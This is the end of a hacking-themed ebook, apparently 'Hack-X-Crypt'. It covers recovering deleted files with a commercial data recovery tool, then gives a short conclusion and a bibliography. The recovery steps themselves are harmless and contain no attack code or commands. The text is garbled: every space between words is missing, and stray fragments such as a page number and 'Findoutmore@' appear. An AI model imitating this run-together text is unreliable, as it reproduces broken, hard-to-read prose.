SohereIamusingatoolnameas“stellarphonixwindowsdatarecovery”torecoverthepermanentlydeletedfiles.

Byusingthistoolyoucanrecoveryouraccidentlydeleteddatafromyourcomputer.

Forityouhavetofollowsimplestepsasmentionedbelow:

Clickontheoption“deletedfilerecovery”or“folderrecovery”accordingtoyourchoice.Thenchoosethelocaldrivefromwhereyouwanttoscanforthedeletedfiles/folder.Thenitasksyouforaquickscanordeepscan,youcanchooseasaccordingtoyourneed.

Afterthatitscansforallthedeletedfiles/folderfromyourparticularselectedlocaldrive.Andshowyouthelistoftheentirefolderfromwhichfilesaredeleted.

Thenyouhavetoselectyourdeletedfile/folderwhichyouwanttorecover,asIhaveselectedhere“hackingtools”fromthefolder“vi”.Andthenclickontherecoveroptiontorecoveryourdatasuccessfully.

Note:-Therecovereddatawillworkonlywhentheaddressofthatlocationisempty/notoverwrittenfromwherethatfile/folderisdeletedaccidently.

CONCLUSION:

ThanksForreadingthisbookandIhopethecontentsdescribedinthisbookwillhelpyoutoknowtheintentsofhackers.Nowyouarecapableofsecuringyourownandyoursurroundingcomputers,mobilephonesandothernetworksfromtheThreatwecalled“HACKINGAnartofexploitation”.

BIBLIOGRAPHY

THEBIGCOMPUTING.COMHackingfordummiesHackingexposedXDAdevelopersEtc.Findoutmore@

THEBIGCOMPUTINGdotCOMHACK-X-CRYPT

204